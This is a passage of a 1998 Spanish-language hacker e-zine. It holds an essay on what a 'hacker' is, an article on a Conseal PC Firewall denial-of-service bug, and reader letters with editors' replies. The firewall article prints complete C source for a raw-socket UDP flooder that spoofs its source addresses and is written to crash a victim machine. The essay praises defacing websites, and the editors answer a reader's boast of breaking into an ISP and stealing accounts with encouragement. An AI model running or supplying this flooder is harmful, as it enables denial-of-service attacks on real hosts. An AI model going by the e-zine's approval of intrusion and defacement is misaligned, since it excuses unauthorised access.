  supuestamente anarquico, acoge diversos grupos que se relacionan y
  desarrollan ahi; los cuales podemos clasificar de muy diversas formas; una
  es su situacion respecto a la ley, la ley del mundo no-electronico, otra es
  con arreglo a sus conocimientos ; otra importante clasificacion seria su
  etica, refieriendose con ello a su actitud con otros "ciuadanos" de la red y
  con los conocimientos que en ella, la red, uno puede encontrar.

        Podriamos decir que la comunidad de Internet se divide en cuatro
  grupos principales: 1- Usuarios normales, 2- Empresas, 3- Organizaciones
  gubernamentales y 4- Mundo Underground.

        El "mundo" Underground sera el lugar donde encontraremos a los
  infalibles "Hackers". Pero...  Que es el mundo Underground ? Bueno,
  empezemos por definir que es Underground. El termino Underground biene
  definido o dado de los paises de habla Anglo-Sajona (Ingleses y Americanos)
  y se refiere a grupos de cultura minoritaria, que se desarrollan bajo la
  cultura general y que tienen unas determinadas creencias y filosofias
  bastante heterodoxas si los comparamos con la "mayoria cultural". Esta
  definicion es facilmnte aplicable a Internet donde encontraremos facilmente
  diversos grupos interesados en aspectos culturales, que normalmente
  considerariamos minoritarios. Es aqui, en el "mundo Underground" donde
  encontraremos grupos especialmente interesados en aspectos relacionados con
  la "seguridad informatica", ya sea en su "creacion" como en su "violacion".
  Este grupo de usuarios podemos lo podemos dividir en tres ramas: Wanabes,
  Crackers y Hackers. Llegando a este punto donde sabemos donde encontrar a
  los "Hackers" y sabien en que contexto se mueven, empecemos con la
  aproximacion a este grupo y de las diferentes definiciones que de el se
  hacen.

        Ciertos grupos empresariales , organicaciones gubernamentales, cuerpos
  de seguridad y colectivos en cierta forma retrogrados suelen definir
  "hacker" como esos "malas" personas que se dedican a burlar sistemas de
  seguridad, la copia y el robo asi como la destruccion de datos mas o menos
  valiosos almacenados en un ordenador, y a los cuales, los hackers, no tienen
  acceso legal. Los hackers son seres a los que hay que eliminar asi como a
  su perniciosa filosofia que poseen y que pone en peligro a todos los
  habitantes de la red y a sus datos, con sus maniobras y juegos causando
  "miles" de millones de perdidas con sus salvajes ataques. Bueno, es una
  definicion "curiosa", o decir algo, a tener en cuenta como a cualquier
  otra, ante todo en Internet hay libertad de expresion, aunque ellos, estos
  grupos decadentes y de concepciones de cierta manera arcaicas, cometen un
  error de definicion, para asi, defender sus intereses, no claramente
  identificables, y etica que nos intenta implantar.

        Por otro lado estan aquellos que navegando por la red encuentran
  ciertos articulos, comentarios, rumores... y devido a su inexperiencia o a
  que nadie les ha dado una definicion mejor consideran a los hackers como
  "Esos magos de las fuerzas de Internet" que "desafian a los poderosos". Los
  Hackers son "cojonudos" o "la ostia", son "tios guais" (de mayor quiero ser
  como ellos :) ), que se mueven como pez en el agua en Internet y el resto
  de las redes. Es una "bonita" definicion pero creo que "ligeramente" ;)
  incorrecta.

        La tercera definicion fue desarrollada hace tiempo, definiendo como
  hacker como a un programador com amplios conocimentos de seguridad
  informatica que puede descubrir bugs (agujeros) en el sistema de seguridad,
  sabiendo como aprobecharlos para entrar dentro del sistema gracias a esos
  fallos anteriormente descritos. Esta definion fue primeramente utilizada por
  los primeros "hackers" que salieron del M.I.T. (Massachuset Institute of
  Technology). 

        Finalmente llegamos a lo que considero una definicion mas acertada,
  que no por ser mia es la mas correcta ni valida, pero que espero que de
  alguna manera resulte util y aclare aunque sea un poco este enrredo creado
  alrededor de los "Hackers" a los cuales o bien se les vilipendia o bien se
  les "ensalza" mas alla de cualquer limite logico hasta niveles de semidioses
  electronicos, lo cual no es correcto, a fin de cuentas, somo humanos, aunque
  a veces un poquito raros cuando nos colocan una pantalla y un teclado
  delante, pero bueno, vamos al asunto. Los "hackers" son en cierta forma
  programadores , guerreros y filosofos  Menuda definicion verdad !, esperad
  que os lo aclare y no penseis que estoy ms loco de lo que realmente
  estoy ;).

        Los Hackers son programadores, Son programadores devido a que saben
  programar, sin unos conocimientos de programacion, S.O. y redes seria muy
  dificil que realizaran su labor como hackers, si no imposible. Si, ya se que
  en internet podemos encontrar programillas que realizan las labores mas
  tendiosas en lugar de realizarlas nosotros pero con dichos programas, no
  podemos sacar ni una pequea parte del potencial que tenemos con unos
  conocimientos sobre UNIX, redes, S.O. en general, C, perl. Asi es importante
  saber. El saber, el conocimiento es el poder del hacker.

        Por otro lado podemos considerar a los hackers como guerreros. que
  luchan por defender la libertad de Internet. Una libertad que tanto Estados
  como grandes compaias intentan suprimir. Para ello, los hacker luchan de
  muy diversas formas: publicando articulos, e-zines, paginas web,
  informacion valiosa que nos permite ampliar los conocimientos y mantener la
  libertad. Tambien hay formas de "lucha" mas activas como la inutilizacion o
  hackeo de paginas web denigrantes, como las de pornografia infantil.

        Por ultimo, y en cierta forma abstracta se puede considerar a los
  hackers (o algunos hackers) como filosofos, con sus ideas de libertad cuasi
  absoluta en la red, una filosofia que desarrollan y defienden, poniendo esa
  libertad por encima de intereses economicos o individuales, siendo a veces
  perseguidos e insultados por los poderosos.

        Se deve recalcar tambien que todo lo que hacen los hackers, segun la
  filosofia en que se amparan, no es destructivo ni una busqueda de beneficios
  personales, los miembros del mundo underground que buscan esto ultimo se
  suelen definir como crackers y si bien algunos de estos tienen conocimientos
  que les podrian equiparar con los hackers, aunque la mayoria no los tengan,
  es la filosofia hacker lo que les diferencia a unos de otros.

        Pues nada, ahi teneis una definicion, espero que os guste y os
  parezca correcta si no, la borrais de vuestro disco y fuera. ;) Espero que
  no!
                        From:       Tasslehoff
                              - J.J.F. / Hackers Team -
                                tasslehoff@jjf.org

<>

<>

                           Conseal PC Firewall Bug
                           -----------------------

                                  By Bisho

  1.- Conseal PC Firewall 1.2 y anteriores Bug
  2.- Proteccion
  3.- Herramientas
      3.1.-Como funciona el programa
      3.2.-conseal.c

        En este articulo voy a tratar un tema que me parece bastante
  interesante. Es un bug del Conseal PC Firewall. Se ha descubierto que tiene
  un fallo de DoS (denial os service) y muy facil de explotar. Bien vamos a
  ello :o).

  1.- Conseal PC Firewall 1.2 y anteriores Bug
  --------------------------------------------

        Es un ataque bastante facil de DoS (denial of service). Solo funciona
  en las versiones anteriores a la de junio del 98 (ya que fue cuando se les
  notifico el fallo a los de Signal9 y arreglaron el bug en una semanita mas
  o menos), la cual es la version 1.2 o anterior. Pero en muchos sitios warez
  todavia tienen esta version, lo que hace que este ataque todavia funcione.

        La verdad es que este tipo no tiene nada de especial, un floodeo, pero
  cambiando las IP's se consigue que se cuelgue el ordenador incluso si se
  han cambiado los puertos. Esto causa que conseal se coma TODOS los recursos
  disponibles del ordenador y como resultanto un reseteo del mismo :o) si el
  ataque continua durante 10 a 30 segundos despues de colgarlo.

  2.- Proteccion
  --------------

        La verdad es que es bastante simple, solo tienes que quitar el modo
  "learning" y el "logging". Signal9 se habia dado cuenta de este fallo mucho
  antes de que incluso este ataque se "sacara al mercado", por eso ahora la
  gente puede comprarse el firewall y tenerlo actualizado y te olvidas de
  problemas. Y para aquellos que lo han usado con un crack o con un generador
  de llaves (key generator), deciros que no estais tan protegidos como
  deberiais.

  3.- Herramientas
  ----------------

  3.1.- Como funciona el programa
  -------------------------------

        La manera que este programa usa para colgar el ordenador puede ser:

        3.1.1.- Si el programa se esta ejecutando en modo "learning" se
  produce un flodeo y tratara todo el rato de escribir nuevas "rules"
  (reglas), esto provoca que use todos los recursos del ordenador y se
  cuelgue, e incluso un reseteo del ordenador.

        3.1.2.- Si esta usando el modo de "logging" de los ataques o de la
  informacion que pasa a traves del firewall, esto hara que por culpa del
  numero de paquetes de informacion que intenta escribir se cuelgue. 

  3.2.-Conseal.c
  --------------

        Este es el codigo fuente del programa que explota el bug:

------------ Codigo Fuente ---------------------------------------------------

#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in_systm.h>
#include<netinet/in.h>
#include<netinet/ip.h>
#include<netinet/udp.h>
#include<errno.h>
#include<strings.h>
#include<netdb.h>
#include <stdlib.h>
#include<stdio.h>
#ifdef BROKEN_LIBC#include <arpa/inet.h>
#else
#define u_char unsigned char
#define u_short unsigned short
#endif
struct sockaddr sa;int 

main(int argc,char **argv)
{

int fd;
int x=1;
int hosti=192;
int hostii=168;
int hostiii=1;
int meep=0;
int fooport=1;
int numpack=0;
char funhost[15];
struct sockaddr_in *p;
struct hostent *he;

u_char gram[36]= 
 {
 0x45, 0x00, 0x00, 0x26,
 0x12, 0x34, 0x00, 0x00,
 0xFF, 0x11, 0, 0,
 0, 0, 0, 0,
 0, 0, 0, 0,

 0, 0, 0, 0,
 0x00, 0x12, 0x00, 0x00,

 '3','1','3','3','7','8','9','0'

 };

if(argc!=3)
 { 
 fprintf(stderr,"Saihyousen, by Noc-Wage\n");
 fprintf(stderr,"The faster your connection to the internet is
 (latencywise, not bandwidth)\n");
 fprintf(stderr,"and the lower the CPU speed of the victimwill\nincrease
 probability of success\n");
 fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen127.0.0.1
 40000\n",*argv);
 exit(1);
 
 };

if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
 { 
 perror("requires RAW SOCKETS");
 exit(1); 
 };

#ifdef IP_HDRINCL
if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
 {
 perror("setsockopt IP_HDRINCL");
 exit(1);
        };

#else

fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n");
#endif

/* The stuff below is so that it's not fully sequential 
 i.e   100.100.100.101, 100.100.100.102  */

for (numpack=0;numpack<=atoi(argv[2]);numpack++)
 {
 if (meep==0) { ++hosti; meep++;
 }
 if (hosti>254) hosti=1;
 if (meep==1)
 {
 ++hostii; meep++;
 }
 if (hostii>254) hostii=1;
 if (meep==2) { ++hostiii; meep=0;
 }
 if (hostiii>254) hostiii=1;

sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti);
(he=gethostbyname(funhost));
bcopy(*(he->h_addr_list),(gram+12),4);
if((he=gethostbyname(argv[1]))==NULL)
 {
 fprintf(stderr,"can't resolve destination hostname\n");
 exit(1);
 };

bcopy(*(he->h_addr_list),(gram+16),4);
fooport++;
/* resets the port to 1 if it's nearing the end of possible values */

if (fooport>65530) {fooport=1;};
*(u_short*)(gram+20)=htons((u_short)fooport);
*(u_short*)(gram+22)=htons((u_short)fooport);

p=(struct sockaddr_in*)&sa;p->sin_family=AF_INET;
bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));
if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(structsockaddr
)))== -1)
 {
 perror("sendto");
 exit(1);
 };
 
 /*printf("Packet # %i\n", numpack); */
 /* Turn that on to see where you are.. it'll slow the attack though */

 };

 printf("Attack against %s finished", argv[1]);
 putchar('\n');
 return 1;

}

------------ FIN -------------------------------------------------------------

  NOTA:
  -----

        Este programa deberia funcionar en cualquier plataforma Linux, no
  estoy seguro si chuta en FreeBSD, pero deberia, y si no trata de
  modificarlo a tu propio riesgo.

        Para una actualizacion de este firewall pasate por
  http://www.signal9.com. Esta version ya esta arreglada contra el bug :o).

        Si tienes algun comentario o lo que sea, mandame un par de lineas a:
  rolling_weables@hotmail.com y tratare de ayudarte :o).

<>

<>

                           Ŀ
                          <  EL LECTOR OPINA  >
                           

        Deciros varias cosas que estamos viendo en la seccion del EL LECTOR
  OPINA, primero que no envies cosas que no hayais escrito vosotros sin la
  autorizacion del autor o por lo menos mantener los creditos, como a sucedido
  en el numero 6 que un lector envio un mail con un texto que se titulaba
  CARTA DEL JEFE INDIO y que resulto no ser suyo!! Si no sabes que decir,
  mejor no digas nada. Segundo, recibimos muchos articulos de gente que quiere
  escribir y nos dice si estamos interesados, la respuesta en SI, NO HACE
  FALTA QUE ENVIES UN MAIL PREGUNTADO, lo que teneis que hacer es escribir el
  articulo y enviarnoslo!!! Tercero, ahi gran cantidad de mail's que son
  realmente tontos, hemos dicho mil veces que no damos clases o sea que no
  hace falta que envies mail preguntando y tampoco hackeamos a peticion del
  lector o enviamos informacion. Con esto solo queremos decir que penseis que
  vais a decirnos antes de escribirnos!!!!!!

        Recomendamos leer nuestro FAQ.

<>

  Date: Thu, 22 Oct 1998 19:36:16 GMT
  From: brownies@xxxxxxxxxxxxxx (Pedro Fried Reinitz)
  To: Subject: help me 

  Hola:
  Te escribimos desde chile para pedirte ayuda ya que estamos empezando o
  mejor dicho tratando de hacernos HAKERS.
  Te queriamos pedir ayuda con varias cosillas
  1.-como uno empieza (que programas etc)
  2.- me consegi linux y en realidad es mmmmm IMPOCIBLE a y
  3.- algun program para hacer logos como el de su coolisimo web (ej jjm
  them ...).

  te lo agradeseria mucho tus segidores chilenos .....
  pd: si puedes mandarme algunos txt etc y material util seria muy feliz...
  adios y gracias denuevo

  <------>

  [ Pues lo mismo de siempre, para comenzar es simple curiosidad, estudia
    todo lo que pase por tus manos, saca tus propias conclusiones y asi
    seras un Hacker. ]

<>
  
  Date: Thu, 22 Oct 1998 09:42:13 GMT
  From: "Luis" <"luis@xxxxxxxxxxxxxx"@xxxxxxxxxxxxxx>
  To: Subject: necesito informacion 

  Me podrias ayudar con el desencriptador de claves John_15, que no tengo ni
  la mas minima idea de como usarlo. 

  Luis Esteban 

  <------>

  [ Te recomendamos el n6 de nuestro ezine, el cual se explica el uso del
    John The Ripper, entre otros :) ]

<>

  Date: Wed, 21 Oct 1998 05:51:33 GMT
  From: Jesus Avila <avimolje@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net Subject: Necesito ayuda. 

  Tengo un telefono movil. Un Nokia.
  El problema es que no me acuerdo del Pin number o codigo de acceso del 
  telefono. 

  El telefono es un NOKIA NK503 
  y el "type" es NHK-6RY 
  Existe alguna manera de crakear el telefono? 

  Muchas gracias 
  -- 
  Jesus Avila 
  BSc IT 

  == 
  Jesus Avila Molina 
  ETT esp. TELEMATICA 
  BSc INFORMATION TECHNOLOGY 

  <------>

  [ Leete el n6 de nuestro ezine y pasate por el web de CPNE, donde
    encontaras material muy interesante.

    http://cpne.islatortuga.com ]

<>

  Date: Tue, 20 Oct 1998 19:22:25 GMT
  From: "SparK" <sparkboy@xxxxxxxxxxxxxx>
  To: Subject: Una pregunta 

  Hola equipo, les mando este mail porque quiero hacerles una pregunta...
  Soy un newbye que se esta guiando principalmente por sus e-zines y por las
  GTMHH de Carolyn Meinel, pero solo he encontrado los numeros 1, 2 y la
  mitad de la 3 en espaol.
  Le pregunte a la misma Carolyn donde los podia encontrar pero la respuesta
  que me dio (1/4 de linea) no me sirvio ya que ese servidor
  (uberhacker.islatortuga.com) no esta disponible.
  En fin, lo que quiero es saber si ustedes por favor me podrian mailear
  alguna direccion web o ftp para obtenerlas.
  Gracias

  <------>

  [ Pues ahora mismo no me acuerdo de ningun sitio en concreto pero pasate
    por Underhack o Iberhack. ]

<>

  Date: Mon, 19 Oct 1998 14:38:27 GMT
  From: "alejandro andrade" <aandarde@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: hola re quiero informancion si sepuede? 

  estoy llevando una investigacion en la escuela sobre los piratas en
  internet y en contre esta direccion asi que si podrian alguno de 
  ustedes mandarme algo de que por estan en la red ? por que lo 
  hacen , son un beneficio o un perjuisio quisiera saber mas sobre 
  ustedes lo poco de se de ustedes es por revista a si que espero que 
  me puedan dar esa informancion y si se puede ser como estedes 

  me despido esperando su repuestas 

  antetodo gracias

  <------>

  [ Primero no somos piratas, simplemente somos gente curiosa con ganas de
    explorar el mundo informatico. Nosotros investigamos y sacamos nuestros
    resultados, que pueden gustar o no pero eso no nos importa :) Claro que
    se puede ser como nosotros, pero ello con lleva mucho trabajo y ahi
    muy poca gente dispuesta a ello realmente. Leete nuestro FAQ. ]

<>

  Date: Sat, 17 Oct 1998 09:35:41 GMT
  From: "Mauricio Espinoza Loma" <esplom@xxxxxxxxxxxxxx>
  Subject: Preguntas 

  solo tengio algunas preguntas

  - para que sirber el escanear una linea y scanear los puertos
  - Tambien quiero decir que no pude descomprimir el el escanaador de lineas
    de telefono
  Gracias...........

  <------>

  [ Escaner una linea?? Supongo que te refieres a un WarDialer, pues es un
    programa para buscar ordenadores conectados a la linea telefonica,
    mientras que un scaner de puertos es otro programa para saber que puertos
    tiene abiertos un sistema informatico.
    A que te refieres exactamente con que no pudistes descomprimir el
    programa ? ]

<>

  Date: Sat, 17 Oct 1998 08:53:19 GMT
  From: "Mauricio E. L." <mauriciobo@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: Entusiasta a hacker

  Mira solo tengo algunas preguntas que quisiera que me la
  respondieses??? 

  1.- Si un hacker es una persona mas estrictamente 
  programador y el contruye programas para interrumpir sistemas. 
  O si se vale de algunos defectos de los sistemas (ej: Unix 
  para interrumpir ese sistema.?? 

  2.- Quisiera que me ayudades a ser un hacker o a dar los 
  primeros pasos ??? 

  Mi nombre: Mauricuio 
  Edad: 20 
  carrera: Ingeieria de sistemas 
  Jobi : Programacion 
  Interes: Hackers 

  - Yo ya tube algunos buenos resultados el cual fue introducirme al servidor
  de un provedor de internet y sacar algunas cuentas ???? 
  Te agradeseria mucho si me pudieras ayudar, porque busque 
  un grupo como ustedes hace tiempo..?? 

  Luego quisiera colaborar con su grupo 

  <------>

  [ Un Hacker debe ser capaz de escribir sus propios programas y tambien debe
    ser capaz de explotar fallos en el sistema. Pues lee nuestro ezine que
    seguro que te sera de mucha ayuda :)
    Claro que puedes participar, escribe sobre algo que te guste y nos lo
    envias. ]

<>

  Date: Wed, 14 Oct 1998 20:06:38 GMT
  From: "Lorena A" <alcaraz@xxxxxxxxxxxxxx>
  To: Subject: HELP! 

  Hola no se si sera posible lo que voy a pedir
  pero resulta que ayer por icq, un tipo me volvio loca mi compu, segun el
  poedia ver todos mis archivos, no tengo idea, como pudo pasar, ayer recibi
  archivos desde icq, los cuales ingenuamente instale, eran unos Nuketes,
  como genocide y ese estilo, puede que me haya entrando a mi sistema por
  emdio de eso?
  La cosa es que yo, verifique con todos los antivirus habidos y por haber, y
  no me encuentra nada,
  Asique por medio de un virus no entro.
  Yo quiero saber si me pueden aconsejar algo, apra protejerme.
  Bueno, si pueden contestarme se los agradesco. 
  Saludos
  Lorena.

  <------>

  [ Pues seguramente te habra metido en uno de esos nukes el BO (Back Orifice)
    o el Netbus, los cuales permite controlar un ordenador remotamente.
    Estos programas solo son dectados por pocos programas especificos por eso
    tus AV (AntiVirus) no han encontrado nada. Nosotros estamos trabajando en
    una herramienta que elimine el BO, pero mientras tanto, te remito a esta
    herramienta, la cual te sera muy util:

    http://www.genocide2600.com/~tattooman/new-uploads/boe.exe ]

<>

  Date: Wed, 14 Oct 1998 06:52:18 GMT
  From: Antonio Moreno <paj@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: FAVOR 

  Hola! Soy un estudiante de InformAtica de GestiOn de primer ao, y os
  escribo para saber si me podOis hacer un favor. Resulta que hay muchos
  amigos mios (incluso yo) que desean que no existiera la siguiente pagina.
  Gracias y espero que podeis ayudarme. Confio en vosotros. Espero que podais
  hacerlo cuanto antes. Ya segui las instrucciones de un fichero para obtener
  el password, pero no me ha funcionado. No lo entiendo. Siento no saber nada
  de Unix. Gracias anticipadas y hasta la proxima conexion! Saludos desde
  Murcia.

  <------>

  [ Sorry, pero no nos dedicamos a atacar servidores a peticion de los
    lectores. Leete el FAQ. ]

<>

  Date: Tue, 13 Oct 1998 15:32:36 GMT
  From: JROBLES <JROBLES@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: No consigo bajar el numero 6 

  Amigos del JJF, me dispongo como siempre a bajarme el ultimo numero
  de vuestro E-Zine, pero se me para de cargar en el articulo de Linux; lo 
  he intentado varias veces pero no consigo bajarmelo entero. 
  Os agradeceria me lo mandaseis por correo a mi e-mail 
  GRACIAS 

  <------>

  [ Pasate por nuestro FTP, que alli lo bajaras sin problema :) y si no
    ponte encima del link y pulsa el boton derecho y dale para salvar el
    fichero :) ]

<>

  Date: Sun, 11 Oct 1998 09:16:20 GMT
  From: Lau <lau.x@xxxxxxxxxxxxxx>
  Subject: Ayudita ! 

  Hola soy Lau y tengo un problemita, en realidad no se si es un problema, te
  cuento en el chat un pibe me paso el siguiente programa: Back Orifice, me
  dijo que era algo as como un icq, pero nada que ver, con eso tiene control
  sobre mi compu, por un lado me gust todo lo que pudo hacer l desde su casa
  y por otro no me gusta que tenga acceso a mi compu, qu hago, ayudame porfi. 
  Estuve leyendo tus articulos, quiero aprender todo lo que esta en la pagina
  de hackers, me gusta, pero para eso primero quiero librarme de ese tipo,
  como hago, ayudame!!!!!! 

  Lau 

  Lau... desde Argentina 

  <------>

  [ Eso es un programa para controlar un ordenador remotamente. Te
    recomendamos que utilizes esta herramienta:

    http://www.genocide2600.com/~tattooman/new-uploads/boe.exe ]

<>

  Date: Sun, 04 Oct 1998 14:27:25 GMT
  From: <intrepido@xxxxxxxxxxxxxx>
  Subject: hola 

  la pagina es una maza me gustaria saber con que programa la crean y donde
  los puedo conseguir desde ya gracias.

  <------>

  [ Pues facil, Notepad (Viene con el Win95/98/NT :) Rulez y las fabulosas
    manos de Mac Crack. ]
 
<>

  Date: Sun, 04 Oct 1998 11:23:31 GMT
  From: Abel Larrama <alarrama@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: desde uruguay. 

  Hola a quien corresponda. Como dice el asunto soy un chico de uruguay
  que tengo 17 aos, me encanta todo sobre computadoras, aunque me doy 
  cuenta que no se casi nada, recien me inicio en el mundo de la red y me 
  interesa saber toda informacion sobre hackers y crackers, me refiero a 
  ustedes con el motivo de saber si me podrian ayudar porque quisas por 
  ignorancia y aprendisaje me he vajado un archivo que dejo un bugs por el 
  cual entra en mi pc un hack que no me deja aprender tranqui, no me 
  molesta pero quiero saber cosas sobre ellos y como ser uno para poder 
  evitarlos, no se como podre arreglar eso quisas con un format de disco, 
  ya vere, me gusta lo que ustedes hacen y tambien me gustaria que me 
  pudieran ayudar si no es mucha molestia, aunque sea un poco para poder 
  prevenirme y saber algo mas de este fantastico mundo del pc y la net. 
  Sin mas me retiro, agradeciendoles de ante mano. 

  ABEL LARRAMA 
  PD: por favor contesten esta carta mi nick es Jeque. 

  <------>

  [ Para eso esta este ezine, para aprender todos :) ]

<>

  Date: Thu, 01 Oct 1998 15:37:16 GMT
  From: <drslump@xxxxxxxxxxxxxx>
  To: JJF Hacker Team

  Holas!

  Bueno, pues escribo esta critica a ver si vuestras mercedes conceden a 
  ponerla en el ezine :)) 

  Bien, esto es un escrito para los hacker-wannabes que no son mas que esos, 
  no me considero, ni probablemente llegue a serlo nunca, un hacker, pero 
  lejos de eso , tampoco me considero un paleto que quiere llegar a ser 
  hacker, pero que no quiere dejar su windows95 porque mola mas. 
  Bueno, empiezo mi caotica critica a raiz de una discusion tenida por la 
  *excelente* Vampire BBS. 
  Creo que todo empezo cuando Wintermute ( hola Winter :) ) paso un forward 
  del archifamoso texto de "linuxeros rules", ese en el que los linuxeros que 
  no tienen ni puta idea usan linux porque "rules" y es guay .... 
  Bien, todos los que andan por alli (y los que me conozcan) saben que soy un 
  acerrimo defensor del linux, y entonces no pude reprimirme y salto cagandome 
  en la madre que pario al que escribio el texto ese. Bueno , entonces Dairo, 
  Winter, BitSpawn y no recuerdo quien mas, me dijeron que ese texto estaba 
  dirigido a la bella poblacion de subnormales que dicen que "linux rules" 
  pero que no lo han probado en su vida. 
  Bueno, el caso es que yo no habia conocido a nadie de ese tipo de gente, y 
  realmente, no creia que existiera, pero el otro dia, me encontre con uno de 
  ellos, que tiene internet y "esta harto del windows 95 y a ver si le paso el 
  linux porque es el mejor sistema operativo que hay, por cierto funcionan 
  todos los programas de windows en linux?" 

  AAAAAAAAAAAAAAAAAAARRRRRRRRRRGHHHHHHHHHHHHHHHHHHHHHHHH 

  Bien, pido disculpas a todos los de Vampire por mi error, ya que gilipollas 
  hay en cada calle :( 
  Bueno, a que viene todo esto? 
  Pues viene a que estoy hasta los cojones de ver a la gente decir "quiero ser 
  hacker, se puede hackear con windows ?" y demas polleces. 
  Alguien con espiritu de hacker, probara lo nuevo, le gusta investigar, y 
  alguien que cumple esto, se merece mi respeto , independientemente de los 
  conocimientos que tenga, para mi un hacker es alguien que explora y descubre 
  cosas nuevas (Cain, tu SI eres un verdadero hacker), y no un payaso que
  quiere entrar en otro ordenador para demostrar lo cool que es a sus amigos. 
  "Me tengo que poner linux para ser un hacker?" 
  Cuantos habeis oido/leido esto? 
  Supongo que muchos, bien, yo intentare contestar la pregunta: 
  -No tienes que ponerte linux para ser un hacker, sino que hasta que no 
  indagues por tu cuenta, pongas empeo en satisfacer tu curiosidad, y no en 
  "ser un hacker" o en que la gente piense que eres cool, no seras nunca ni un 
  intento de hacker. 
  Tengo las ideas embotadas, una rabia increible las aprieta todas y las
  atasca en la salida, son tantas que no las puedo expresar con palabras (y si
  le sumamos que me consideran subnormal, pues estamos apaaos). 

  Lo que intento decir es que un usuario convencido de Windows no puede ser 
  nunca alguien a quien le gusta la informatica (o francamente, tiene un gusto 
  pesimo), o alguien curioso. Alguien que se resiste a saltar a linux no es 
  curioso, y lo que realmente quiero decir es que alguien asi no llegara nunca 
  a ser un hacker, sino que perecera en el intento de parecerlo. 
  Me suena eso de leer a ciert@/s individu@/s por la IRC decir "ahora estoy 
  con windows pq me ha petado el linux" o " es que estoy probando el windows 
  98, pero siempre uso linux" y ese windows parece que dura siempre, o sea, 
  que se ve a 1000 leguas que es otro hacker wannabe. 
  Probablemente conozcais al personajillo en cuestion, pero hay mas como el, 
  que presumen de ser "hackers" y de haber entrado en sitios, cuando realmente 
  te das cuenta de que no tienen ni idea, y de que incluso YO se mas que 
  ellos. Como alguien asi puede pasearse impunemente por la IRC? Es increible 
  la de gilipollas que hay por ahi sueltos, pero bueno. 
  Esto simplemente intenta ser algo que les haga desistir antes de darme mas 
  asco de la condicion humana en general, puesto que demuestran su egolatria, 
  y cuantos egolatras andan por ahi sueltos. Es que lo cojonudo es que no les 
  basta con intentar ser algo que nunca seran, sino que se las dan de lo que 
  no son. 
  Un hacker nace curioso. Yo no soy hacker, pero espero llegar a tener al 
  menos cierto conocimiento sobre el tema con el paso del tiempo, y tengo la 
  esperanza puesto que he sido siempre muy curioso, pero gente del tipo 
  "instalame el linux, ya sabes como lo quiero, preparamelo para tirar a la 
  gente y para hackear" te dejan la moral por los suelos. 
  Bueno, creo que poco mas que decir queda, creo que mas o menos me he 
  expresado bien y mis sentimientos han quedado minimamente reflejados. 

  Saludo desde aqui a mi novia, que hace posible que siga viviendo, a
  - J.J.F. / Hackers Team -, a Phuck Systems (en especial a Gabber, que
  aguanta tanto con el camion), a Enif, que me ensea cosas, a OiOiO, que me
  aguantan en el grupo, y a #rjn , Vampire BBS, a (casi) toda la gente de
  Fido y Subnet, a Sanity, Nobody, DarkBlack a Koji y a la vaca que rie.
  Muuuuuuuuuuuuuuuuuuuuuuuuuu

  ----- 
  Bueno, eso es todo. Estaba como que mosqueado por este tipo de gente, 
  vosotros direis si lo poneis o no ..... :) 

  See you ... Dr Slump 

  OiOiO! 

  <------>

  [ Estas cosas pasan y gente inutil ahi por todo el cyberespacio,
    recomendado leer el articulo de Tasslehoff, incluido en este numero,
    para salir de dudas sobre el tema, que es un Hacker realmente :) ]

<>

  Date: Wed, 30 Sep 1998 17:00:52 GMT
  From: "Diego Jordan Garica Garica" <maoma@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net Subject: 

  Buenas soy un novicio en esto del hacking y demas y antes de
  empezar quiero estar bien enterado para que no me den 
  grandes palos! ni me puteen mucho, en la carta que os 
  qescribo queria pediros dos cosas: 

  1.- Si me podrias mandar todas vuestras revistas comprimidas 
  en un archivo zip 

  2.- De dodne me puedo bajar o consegui en unix o linux! si 
  acaso se diferencian algo estos dos programas! y ya 
  encotrare yo las guias de como usarlos! 

  Bueno sin nada mas os dejo..espero vuestra contestacion! 

  <------>

  [ Sorry, pero nosotros no enviamos nada a nadie. Linux es distribuido en
    muchas revistas de informatica. Leer FAQ. ]

<>

  Date: Fri, 25 Sep 1998 16:05:12 GMT
  From: "ZeD" <j172201503@xxxxxxxxxxxxxx>

  creo que deberiais comprimir lo po que yo por lo menos no soy capaz de
  bajarlo me lo podriais mandar a este e-mail? 
  ZeD@xxxxxxxxxxxxxx 
  seria un detalle por cierto muchas gracias por publicar tan pronto los
  articulos que os mande gracias de veras 
  byez 

  http://www.angelfire.com/ak/HACKZED/ZED2.html 
  http://come.to/HaCkS-WeB-RiNg 
  !!visitalas 

  <------>

  [ Pasate por nuestro FTP que alli encontaras el ezine :)
    Dnd, un placer. ]

<>

  Date: Thu, 24 Sep 1998 00:50:38 GMT
  From: root <letal@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: Libro LINUX 

  Hola mushashos, vi con agrado que salio mi nota. Les cuento que estoy en
  un proyecto mas ambisioso. Estoy trabajando en un libro de Linux para 
  principiantes. En cuanto lo termine que calculo sera en un par de 
  semanas se los mando para que lo pongan el su page. 

  Suerte y hasta la proxima. 

  <------>

  [ Pues estamos ansiosos por ver ese libro sobre Unix, y si necesitas ayuda
    puedes contar con nosotros :) ]

<>

  From: <delaosapavon@xxxxxxxxxxxxxx>
  Subject: BUSQUEDA DE DRIVERS PARA CD-ROM 32X (CONEXION POR PUERTO PARALELO)
           PARA LINUX 

  Hola a todos:

  Bueno, antes de nada felicitaciones por vuestro trabajo desinteresado en 
  informar sobre el mundo hack a la gente que mas o menos no controla mucho el 
  tema. 
  El motivo del presente mensaje no es ms que el que me orientis acerca de 
  una duda enorme que tengo y que gente que estudia informtica que conozco no 
  logra ponerse de acuerdo. 
  En primer lugar decir que me interesara enormemente tener instalado el 
  sistema operativo LINUX en mi ordenador a la vez que el sistema operativo 
  WINDOWS 98, pero claro a la hora de decidirme y estar a punto de empezar a 
  instalar ambos, es cuando me surge una interrogante sobre problemas que 
